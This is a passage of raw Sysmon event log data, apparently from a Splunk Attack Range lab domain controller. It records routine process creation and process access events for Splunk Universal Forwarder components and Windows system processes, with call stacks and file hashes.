Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.276{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:51.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C69F4B4817BF964C03A3AA502EC4DAFB,SHA256=2C1A762E155A383DB270D4BE97901A03EFEA170FFFEBD5D131254AE1043912A8,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001051933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.911{466BC892-F677-60EB-9B7D-00000000CF01}82803852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.696{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.682{466BC892-F677-60EB-9B7D-00000000CF01}8280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=617A93885F81C7295BEAF3AC9EDAB096,SHA256=1E3CB4A7C01DCC6D2CBC2CDA8543A30814A9A6DDFEDB7AFE29D13EB3941A2A14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=373480021CAF188AF7EA8C390A8FC1A2,SHA256=991BE16F7456F55926B09291D3C81061BA26B570B426F3CB2A4CAF62A4016C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F8E17B0705ADBB565D140CB9A51045B,SHA256=619946971D449B60585F3A61F10D29A43D905A6959A367656C5E7CEF01826FF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:51.180{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:51.180{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.165{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.165{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:51.166{466BC892-F677-60EB-9A7D-00000000CF01}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:51.128{466BC892-F5CF-60EB-707D-00000000CF01}1196764C:\Windows\servicing\TrustedInstaller.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+7d1d8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.996{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:52.996{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:52.980{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.980{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 